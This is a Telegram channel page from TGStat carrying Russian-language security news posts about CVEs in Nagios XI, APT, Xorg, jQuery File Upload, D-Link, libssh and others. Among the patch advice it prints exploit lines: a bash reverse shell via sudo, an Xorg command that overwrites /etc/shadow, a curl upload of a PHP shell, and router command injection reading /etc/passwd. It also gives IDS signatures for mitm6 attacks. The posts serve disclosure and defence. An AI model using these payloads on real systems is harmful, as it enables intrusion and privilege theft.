Information Hardening

@informhardening Нравится 0
Это ваш канал? Подтвердите владение для дополнительных возможностей

Практическое применение безопасности
@Li11ian
Гео и язык канала
Россия, Русский
Категория
Технологии


Гео канала
Россия
Язык канала
Русский
Категория
Технологии
Добавлен в индекс
28.09.2017 20:30
Последнее обновление
20.02.2019 12:16
Telegram Analytics
Самые свежие новости сервиса TGStat. Подписаться →
Alexandr Sergeevich
Пи Шу о продвижении в Telegram. Открыть канал →
@TGStat_Bot
Бот для получения статистики каналов не выходя из Telegram
1 608
подписчиков
~1.7k
охват 1 публикации
~197
дневной охват
~24
постов / месяц
106.5%
ERR %
2.59
индекс цитирования
Репосты и упоминания канала
11 упоминаний канала
0 упоминаний публикаций
73 репостов
киберпукан
Hackergram
ANTICHAT Channel
Hackergram
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Hse InfoSec
Админим с Буквой
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Киберпиздец
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Camshift
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
~/Documents/journal
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Киберпиздец
ANTICHAT Channel
Каналы, которые цитирует @informhardening
Последние публикации
Удалённые
С упоминаниями
Репосты
#nagios #exploit #обновления

Целая лаба для школьников

В Nagios XI 5.5.6 выявлена сразу пачка простых и эффективных уязвимостей, среди которых удаленное выполнение произвольного кода с правами юзера apache и повышение привилегий, что в комбинации позволяет получить полный доступ к серверу. Доступна версия Nagios XI 5.5.7, в которой данные дыры устранены.

CVE-2018-15708 - RCE с правами apache. Проблема в Snoopy.class.inc, содержащем такой код:

exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

где $URI может быть передан через URI запроса к magpie_debug.php, что позволяет модифицировать команду. Например, следующий запрос приведет к сохранению произвольного файла в /usr/local/nagvis/share, откуда он может быть запущен через веб-интерфейс:

https://x.x.x.x/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https:///%20-o%20/usr/local/nagvis/share/exec.php

CVE-2018-15710 - повышение привилегий через параметр addresses в функции autodiscover_new.php. По умолчанию в /etc/sudoers прописываются разрешения запуска данного скрипта с правами рута и без пароля для юзеров apache и nagios. Пример запуска обратного шелла с повышением:

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp//4444 0>&1;'

И еще:

CVE-2018-15709 - внедрение команд ОС через веб-интерфейс авторизованным пользователем.

CVE-2018-15711 - повышение привилегий авторизованным пользователем Nagios через переустановку ключей администраторов.

CVE-2018-15712 - хранимая XSS от лица неавторизованного пользователя.

CVE-2018-15713 - хранимая XSS от авторизованного пользователя.

CVE-2018-15714 - отраженная XSS

Описание уязвимостей, пути, параметры, форматы можно посмотреть тут: https://www.tenable.com/security/research/tra-2018-37
Вариант совмещения и автоматизации для первых двух дыр: https://www.exploit-db.com/exploits/46221
Information Hardening 31 Jan, 10:33
#linux #обновления #exploit

Подделка пакетов в APT

В APT найдена уязвимость, позволяющая подменить пакеты при загрузке по HTTP. Обычно APT проверяет хеши пакетов и их размер по базе метаданных доверенных пакетов, заверенных цифровой подписью. Однако, как оказалось, данную проверку можно обойти. Конечно, у взломщика должен быть доступ к потоку HTTP-трафика.

Для загрузки данных из репозитория APT запускает дочерний процесс. Взаимодействие между родительским и дочерним процессом происходит с помощью обмена текстовыми командами и данными. Когда загрузка завершена, дочерний процесс отправляет сообщение с уже посчитанными хешами и размером пакета подобное такому:
201 URI Done
URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb
Filename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.deb
Size: 20070
Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000
MD5-Hash: 27967ddb76b2c394a0714480b7072ab3
MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3
SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831
Checksum-FileSize-Hash: 20070

В тех случаях, когда дочерний процесс получает от репозитория редирект HTTP, он передает родительскому сообщение следующего вида:
103 Redirect
URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb
New-URI: http://example.com/new-uri

И значение New-URI тут берется из заголовка Location редиректа HTTP. В нем то и присутствует уязвимость - в него можно включать переносы строк, что позволяет полностью подделать сообщение об успешной загрузке и все хеши в нем. Родительский процесс будет полагаться на эти значения хешей и размера пакета при проверке, хотя по факту был загружен совсем другой пакет.

Проблема получила идентификатор CVE-2019-3462 и исправлена в версии 1.4.9 APT. Обновленная версия уже доступна в репозиториях Ubuntu и Debian.

Статья исследователя, включающая еще размышления на тему отключения редиректов и предпочтения HTTPS: https://justi.cz/security/2019/01/22/apt-rce.html
Information Hardening 23 Jan, 10:01
#soft #обновления #конфигурация

Неприятности с различными клиентами SCP

Несколько новых уязвимостей в самых распространенных реализациях клиента SCP (особо важно для тех, кто часто подключается к чужим серверам):
CVE-2019-6111 - присутствует в OpenSSH scp
Information Hardening 15 Jan, 11:25
#windows #soft #exploit

В то время, как критичный софт обновляется сам

Еще в конце прошлого года была опубликована информация об уязвимостях в некоторых драйверах ASUS и GIGABYTE. Уязвимости позволяют локально повысить привилегии до полного доступа к системе.

Перечень известных приложений, включающих уязвимые драйвера:
- ASUS Aura Sync v1.07.22 и раньше, а также более поздние версии, в которых исправлена только часть уязвимостей
- GIGABYTE APP Center v1.05.21 и раньше
- AORUS GRAPHICS ENGINE v1.33 и раньше
- XTREME GAMING ENGINE v1.25 и раньше
- OC GURU II v2.08

Проверить наличие уязвимых драйверов:

driverquery /V | findstr /I /C:GPCIDrv /C:GDrv /C:GLCKIo /C:Asusgio

Проверить наличие проблемных приложений:

wmic product get name | findstr /I /C:"ASUS Aura Sync" /C:"GIGABYTE APP Center" /C:"AORUS GRAPHICS ENGINE" /C:"XTREME GAMING ENGINE" /C:"OC GURU"

Выпуск исправлений дается тяжело: ASUS продвигается в устранении дыр, но постепенно, а GIGABYTE утверждает, что он хардварная компания, не особо то занимается софтом, а заявленных уязвимостей в их продуктах нет.

Описание уязвимостей и коды PoC от ресечеров: https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities, https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
Information Hardening 19 Dec, 11:04
#wifi #linux #обновления

Обновление от KRACK

Спустя два года после предыдущей версии 2.6 выпущена версия wpa_supplicant 2.7, в которой устранены уязвимости к атаке KRACK: CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, CVE-2017-13086, CVE-2017-13087, CVE-2017-13088, а также уязвимость CVE-2018-14526, позволяющая получить ключ EAPOL в сетях, использующих WPA2 с TKIP.

Другие основные изменения, касающиеся безопасности:
- Добавлен ряд новых функций:
- аутентификация по общему ключу FILS (Fast Initial Link Setup, стандартизирован как IEEE 802.11ai),
- OWE (Opportunistic Wireless Encryption, RFC 8110, используется в WPA3),
- DPP (Wi-Fi Device Provisioning Protocol, используется в WPA3)
- В SAE теперь можно использовать отдельный от WPA2 пароль (требуется, чтобы и точка доступа это поддерживала)
- Добавлена поддержка OpenSSL 1.1.1 и wolfSSL
- Удален весь функционал PeerKey (был подвержен атаке KRACK)
- Различные улучшения доступных криптоалгоритмов: RSA 3072-бит с 192-битной криптографией NSA Suite B, SHA256 в OCSP, SHA384, BIP-CMAC-256, BIP-GMAC-128, BIP-GMAC-256 в FT (Fast Transition, IEEE 802.11r)
- Опция ap_isolate для изоляции клиентов в режиме точки доступа (AP mode)

Вместе выпушена версия 2.7 hostapd с неменьшим расширением функционала и устранением уязвимости к атаке KRACK. Более подробный перечень изменений: http://lists.infradead.org/pipermail/hostap/2018-December/039069.html

В репозитории Debian, например, обновки уже доступны в ветке experimental.
Information Hardening 11 Dec, 10:52
#kubernetes #exploit #обновления

Первая критическая уязвимость в Kubernetes

Жутковатая дыра CVE-2018-1002105: после отправки через API запросов не закрывается сетевое соединение. Например, можно отправить discovery-запрос. После этого отправленные через API запросы будут восприняты бэкенд-сервисами как внутренние запросы от сервера API, отправленные с использованием параметров аутентификации сервера API. В результате можно проводить многие операции с бэкендом, в том числе выполнить произвольный код. По умолчанию discovery-запросы доступны даже неавторизованным пользователям, что можно отключить опцией "--anonymous-auth=false".

Проблема в обратном прокси в фронтенде Kubernetes. Когда он осуществляет процедуру открытия вебсокета, то не проверяет ответ сервера и создает соединение даже при ответе 404. Клиенту при этом придет 404, но соединение все равно будет открыто. Причем прокси осуществляет аутентификацию собственными кредами, чего достаточно для многих операций бэкендов даже без собственной авторизации пользователя.

Проблема исправлена в версиях 1.10.11, 1.11.5, 1.12.3 и новом выпуске 1.13.

Подробное описание бага: https://rancher.com/blog/2018/2018-12-04-k8s-cve/
Пример эксплойта: https://github.com/evict/poc_CVE-2018-1002105
#network #конфигурация

Защита от атак по IPv6

Сигнатуры детекта подмены DHCPv6 и адреса WPAD через DNS/IPv6 для Snort и Suricata от Fox-IT Security Research Team:

# Snort & Suricata signatures for:
# https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6
alert udp fe80::/12 [546,547] -> fe80::/12 [546,547] (msg:"FOX-SRT - Policy - DHCPv6 advertise"; content:"|02|"; offset:48; depth:1; reference:url,blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/; threshold:type limit, track by_src, count 1, seconds 3600; classtype:policy-violation; sid:21002327; rev:2;)
alert udp ::/0 53 -> any any (msg:"FOX-SRT - Suspicious - WPAD DNS reponse over IPv6"; byte_test:1,&,0x7F,2; byte_test:2,>,0,6; content:"|00 04|wpad"; nocase; fast_pattern; threshold: type limit, track by_src, count 1, seconds 1800; reference:url,blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/; classtype:attempted-admin; priority:1; sid:21002330; rev:1;)

Но это всего лишь пара атак. Куда эффективней и надежней целиком отключить IPv6. Вы же им не пользуетесь в самом деле?

Отключается в параметре SYSTEM\CurrentControlSet\services\TCPIP6\Parameters:DisabledComponents, все отключено - 0xFFFFFFFF (REG_DWORD).
Для групповых политик потребуются дополнительные шаблоны. Готовые есть, например, тут: http://sysadminreference.blogspot.com/2014/01/how-to-disable-ipv6-in-windows-vista.html
Information Hardening 30 Nov, 10:08
#вредонос #конфигурация

Троян в зависимостях js-библиотеки

В одном из релизов (3.3.6) популярной js-библиотеки event-stream была установлена вредоносная зависимость: пакет flatmap-stream 0.1.1. Сама event-stream является зависимостью для ps-tree и npm-run-all и еще нескольких тысяч npm-пакетов.

Проверить наличие проблемы в своей системе можно легко командой:

npm ls event-stream flatmap-stream

Также разработчикам приложений рекомендуют пока зафиксировать в зависимостях версию event-stream 3.3.4, поскольку в сентябре предыдущий автор библиотеки передал управление новому (right9ctrl), после чего и появилась указанная вредоносная зависимость. На данный момент она удалена из зависимостей, а релиз 3.3.6 отозван из NPM.

Вредоносный код во flatmap-stream использовался для кражи закрытых ключей от кошельков Copay, которые отправлялись на copayapi.host и 111.90.151.134.
Information Hardening 27 Nov, 10:19
#windows #exploit #обновления

Windows LPE CVE-2018-8550

Свежее повышение привилегий в Windows из-за ряда недостатков безопасности в DfMarshal (COM Aggregate Marshaler).
Несколько примеров эксплуатации для Windows 10 1803 раскрываются тут, как и основное описание: https://bugs.chromium.org/p/project-zero/issues/detail?id=1644
И так как проблем несколько, еще дополнительные описания для тех, кому интересны подробности: https://bugs.chromium.org/p/project-zero/issues/detail?id=1645, https://bugs.chromium.org/p/project-zero/issues/detail?id=1646, https://bugs.chromium.org/p/project-zero/issues/detail?id=1647, https://bugs.chromium.org/p/project-zero/issues/detail?id=1648.

Весь набор проблем лечится единым фиксом и получил общий идентификатор CVE-2018-8550. Хотя примеры эксплойтов приведены для Windows 10, уязвимости присутствуют и в других версиях: Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Исправления выпущены, перечень KB: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8550
Information Hardening 20 Nov, 08:15
#linux #exploit #update

Linux Kernel CVE-2018-18955

Интересное повышение привилегий через нэймспейсы и вложенные нэймспейсы из-за недообработки отображений UID/GID, когда их больше пяти. Подробное описание, скрипты для эксплуатации и ее пример: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712

Проблема появилась в версии ядра 4.15 и устранена в выпусках 4.18.19 и 4.19.2:
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2
#virtualbox #конфигурация #exploit

Учись сражаться за дело рабочего класса!

Итак, вчера мы имеем раскрытие зиродея в VirtualBox, которое не просто раскрытие, а показательный шаг в борьбе ресечеров с неадекватными условиями багбаунти. Подробно претензии ресечара можно почитать тут: https://github.com/MorteNoir1/virtualbox_e1000_0day

Уязвимость повзоляет обойти изоляцию гостевых машин и выполнить код на хостовой системе. Присутствует в последней версии VirtualBox 5.2.20 и более ранних. Патча пока нет, но можно защититься конфигурационно.

Корень проблемы в переполнении буфера в коде эмуляции сетевого адаптера Intel PRO/1000 MT Desktop, который устанавливается в настройках виртуальных машин по умолчанию. Также для проведения атаки требуется режим NAT. Соответственно, если изменить тип адаптера (на PCnet или Paravirtualized Network) или изменить режим NAT на другой - данная атака будет неактуальна.

Уязвимость проявляется независимо от операционных систем, используемых на стороне хоста и гостевого окружения. Эксплуатация уязвимости требует прав root или администратора на гостевой машине и позволяет выполнить код с правами процесса VirtualBox на хостовой системе.

Очень подробное описание уязвимости и процесса экплуатации с кодом: https://github.com/MorteNoir1/virtualbox_e1000_0day
#windows #exploit

Хватит уже Qwerty

Active Directory Federated Services позволяет перебирать пользователей. Определять, существует ли пользователь, по времени ответа. Microsoft пока вроде не согласился, что это уязвимость. И включение в CVE на рассмотрении. Но наверно включат. И мы то понимаем, какой риск получения пароля, если у атакующего в наличии большой пул учеток.

Разница в задержке ответа сервера для существующих и несуществующих учеток значительна, впрочем это зависит от размера базы пользователей. Так что нужно сначала замерить время ответа для заведомо существующей и несуществующей учеток. Источник, пример и подробное описание незамысловатого действа: https://github.com/binary1985/VulnerabilityDisclosure/blob/master/ADFS-Timing-Attack

Пока нет исправления, такие вот дела. Лишний повод напомнить юзерам про сложность паролей.
Information Hardening 30 Oct, 12:04
#linux #exploit #обновления #конфигурация

В твиттере плохому не научат

Быстро набравшая популярность уязвимость CVE-2018-14665 в X.Org Server позволяет повысить привилегии и перезаписывать произвольные файлы. Проблема актуальна только если у Xorg установлен бит setuid. В разных средах он по умолчанию установлен или не установлен.

Если же setuid установлен, то играет роль недостаточная проверка безопасности параметров -modulepath и -logfile. Первый позволяет подключить произвольный модуль, который выполнится с повышенными привилегиями. Второй - перезаписывать произвольные файлы. Параметр -fp позволяет указать путь к шрифтам, который будет тут же записан в логфайл. Отсюда первый, "базовый" вариант эксплойта с перезаписью shadow:

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Другой, без испоганивания shadow, с открытием привилегированного шелла через ld-linux.so: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850

Проблема родилась в версии 1.19.0 и исправлена в 1.20.3. При недоступности обновления для конкретной сборки рекомендуется отключить SUID-бит, имея в виду, что это может привести к ошибкам при запуске через xinit или startx.
Information Hardening 24 Oct, 11:15
#веб #exploit #обновления

jQuery File (maybe Shell) Upload

Жили-жили и вот те раз. С 2015 года юзают уязвимость, а комьюнити как бы не в теме.

Речь конечно про загрузку произвольных файлов в jQuery File Upload, в том числе .php с возможностью исполнения (CVE-2018-9206).

jQuery-плагин jQuery File Upload обеспечивает виджет для загрузки файлов на сайты, поддерживающий групповую загрузку, индикатор прогресса и возобновление прерванных загрузок. Прилагается также набор примеров серверных обработчиков для сохранения отправляемых файлов. Так вот эти обработчики никак не проверяют тип загружаемого файла. Файл сохраняется с заданным пользователем именем в директории ./files и в общем случае доступен для запроса.

В составе плагина предусмотрен .htaccess, который должен ограничивать выполнение .php файлов директивами SetHandler default-handler, ForceType application/octet-stream. Однако это будет работать только при соответствующих разрешениях в AllowOverride (FileInfo) и активном модуле mod_headers.

Так как плагин очень популярен, проблема расползлась по огромному множеству приложений и форков с некоторыми модификациями, но чаще без. Тут https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206 доступен скрипт, который проверяет наличие уязвимости в трех наиболее распространенных вариациях, ну и шелл пытается загрузить, для надежности проверки.

В базом варианте загрузка элементарная:

curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Уязвимость исправлена в версии 9.22.1 (и 9.24.1, но там все немного по другому) - добавлено ограничение типов загружаемых файлов и теперь по умолчанию можно загружать только GIF, JPEG и PNG.
Information Hardening 19 Oct, 11:23
#network #exploit #обновления #уязвимости

Коллекция проблем с сетевым оборудованием за последние пару недель

D-Link
Обход директорий (CVE-2018-10822), хранение паролей в открытом виде (CVE-2018-10824) и внедрение команд (CVE-2018-10823). Уязвимые версии: DWR-116 до 1.06, DIR-140L до 1.02 (кроме 2018-10823), DIR-640L до 1.02 (кроме 2018-10823), DWR-512 до 2.02, DWR-712 до 2.02, DWR-912 до 2.02, DWR-921 до 2.02, DWR-111 до 1.01.

Первые две позволяют получить пароль из файла /tmp/XXX/0:
curl http://routerip/uir//tmp/XXX/0

Внедрение команд:
curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd

Подробнее:https://seclists.org/fulldisclosure/2018/Oct/36

И еще уязвимости в D-Link Central WiFiManager:
CVE-2018-17440 - учетка admin/admin в FTP-сервере на порту 9000
CVE-2018-17441 - XSS
CVE-2018-17442 - выполнение PHP-кода через загрузку архивов RAR
CVE-2018-17443 - XSS

Эти исправлены в версии Central WiFiManager 1.03R0100-Beta1.

Mikrotik
Новый эксплойт для CVE-2018-14847 - получение рутового доступа: https://cxsecurity.com/issue/WLB-2018100099

И еще ряд уязвимостей:
CVE-2018-1156 - возможность выполнения произвольного кода на устройстве при наличии аутентифицированного доступа
CVE-2018-1157 - DoS-атака через исчерпание всей доступной памяти при загрузке файла
CVE-2018-1158 - переполнение стека при рекурсивном разборе запросов
CVE-2018-1159 - выход за допустимые границы буфера в реализации http-сервера

Уязвимости исправлены в версиях RouterOS 6.40.9, 6.42.7 и 6.43.

TP-Link
Три новых уязвимости в TP-Link TL-WR841N:
CVE-2018-15700 - отказ в обслуживании httpd сервиса в результате HTTP-запроса из локальной сети с пустым Referer
CVE-2018-15701 - отказ в обслуживании httpd сервиса в результате HTTP-запроса с заголовком Cookie вида 'Cookie: Authorization;'
CVE-2018-15702 - возможность CSRF в результате неполной проверки Referer (проверяются только первые несколько символов)

Последняя уязвимость комбинируется со "старой" CVE-2018-11714 - возможность обращения к CGI-скриптам без прохождения аутентификации при установке в Referer значения, свидетельствующего о переходе с хостов "tplinkwifi.net", "tplinklogin.net" или с IP-адреса текущего маршрутизатора. Можно получить конфигурацию, изменять ее параметры, сменить пароль для WiFi. Примеры эксплуатации: https://www.exploit-db.com/exploits/44781/. CVE-2018-15702 позволяет выполнять это через CSRF.

Для этих уязвимостей, в том числе CVE-2018-11714, патчи все еще не выпущены. CVE-2018-11714 также присутствует в TL-WR840N.

Junos OS
Исправлено много уязвимостей: CVE-2018-7173, CVE-2018-7170, CVE-2018-7172, CVE-2018-7174, CVE-2018-7175, CVE-2016-1549, CVE-2018-0062, CVE-2018-0061, CVE-2018-0060, CVE-2018-0057, CVE-2018-0055, CVE-2018-0054, CVE-2018-0053, CVE-2018-0052, CVE-2018-0051, CVE-2018-0050, CVE-2018-0047, CVE-2018-0045, CVE-2018-0043, CVE-2018-0049, CVE-2018-0048, CVE-2018-0003, CVE-2018-0046, CVE-2017-15906, CVE-2016-10012, CVE-2016-10011, CVE-2016-10010, CVE-2016-10009. Некоторые из них позволяют получить доступ или выполнить код при особых конфигурациях или дополнительных действиях. Подробности можно посмотреть тут: https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
Information Hardening 18 Oct, 11:13
#libssh #обновление #exploit

Говорят, это смешно. Похоже на то

Очень модно нынче про libssh писать. Там с версии 0.6 унифицировали код клиента и сервера, и в сервер перекочевал функционал считать аутентификацию успешной после сообщения SSH2_MSG_USERAUTH_SUCCESS. Теперь клиенту достаточно отправить это сообщение вместо запроса на аутентификацию, чтобы получить доступ.

Уязвимость получила номер CVE-2018-10933. Исправление добавлено в выпуски 0.8.4 и 0.7.6.

libssh чаще используется для реализации клиентской стороны, а не серверной, поэтому уязвимых серверов не так уж и много. Один из значимых продуктов, где libssh используется для сервера, - GitHub Enterprise - не подвержен уязвимости, так как libssh в нем модифицирована.

Ну и скрипт для проверки наличия уязвимости, он же PoC, открывающий шелл при успешной "эксплуатации": https://www.openwall.com/lists/oss-security/2018/10/17/5
Information Hardening 16 Oct, 11:26
Техподдержка импервы местами ведет в никуда. Я даже было подумала, что она только для избранных, но нет, она есть: https://www.imperva.com/Services/TechnicalSupport
Information Hardening 16 Oct, 11:26
#exploit #конфигурация #обновления

Imperva RCE

На прошлой неделе много интересного опубликовали. Посмотрим для начала забавный эскплойт для Imperva SecureSphere.

Проблема актуальна для версий 13.0.10, 13.1.10, 13.2.10. Злодей может выполнить произвольные команды с правами рута, без аутентификации или с аутентификацией в зависимости от конфигурации системы. Если не настроен SOM/MX/Gateway режим - аутентификация не требуется. Если установлен режим Gateway - необходим пароль юзера imperva.

Используется внедрение непредусмотренных команд в компоненте PWS (набор скриптов Python CGI), конкретно - скрипт impcli.

Ну в общем вот он весь: https://www.exploit-db.com/exploits/45542/
#boot #конфигурация

+1 головная боль

Появились случаи использования UEFI руткитов. Таких, что прописываются прям в микросхему загрузки. Но мода на них наверно так и не разовьется, потому что мы сейчас от них защитимся.

Во-первых, микросхемы SPI имеют набор эффективных способов защиты от перезаписи. Вот только далеко не все разработчики загрузочного софта их используют. Отсюда вывод - отслеживать обновления софта и установить его, если там внедрили защиту, или просто обновлять периодически.

Во-вторых, в прошивке бывают уязвимости. Вывод такой же - обновления.

И в-третьих, самое толковое (потому что реалистичное) - включить Secure Boot. Он будет проверять цифровые подписи ВСЕХ компонентов UEFI и не позволит запустить сторонний код.
#zabbix #exploit #обновления #конфигурация

А вы следите за своим заббиксом?

На днях выпустили версию 4.0 Zabbix. Но пост не о ней, а о том, что было со старыми версиями. Назначенных CVE в заббиксе очень мало: 0 за 2018 год, CVE-2017-2824 и CVE-2017-2826 в 2017, CVE-2016-4338 и CVE-2016-10134 в 2016, а раньше - уже в 2014.

CVE-2017-2824 - это выполнение произвольных команд при подключении от имени заббикс-прокси. Уязвимость устранена в версиях 2.2.19rc1, 3.0.10rc1, 3.2.7rc1, 3.4.0alpha1 и осталась в ветке 2.4.х (которая уже не поддерживалась к моменту выявления проблемы) (https://support.zabbix.com/browse/ZBX-12349).

Возможная атака основана на двух API-вызовах, доступных для заббикс-прокси, command и discovery data. Если на заббиксе включены Auto-discovery и Auto-registration, то он принимает от прокси данные о новых хостах через вызов discovery data и добавляет их в таблицы hosts и interface. Затем с помощью вызова command можно запустить выполнение дефолтных скриптов для этих хостов, причем это не требует аутентификации. Скрипты изначально лежат в таблице scripts (их можно удалить, тогда вся идея испортится):

scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1

Параметр HOST.CONN предназначен для IP хоста, является VARCHAR(64) и передается в таком сценарии от прокси, что позволяет внедрить команду.

Источник и детали (формат вызовов тоже есть): https://talosintelligence.com/vulnerability_reports/TALOS-2017-0325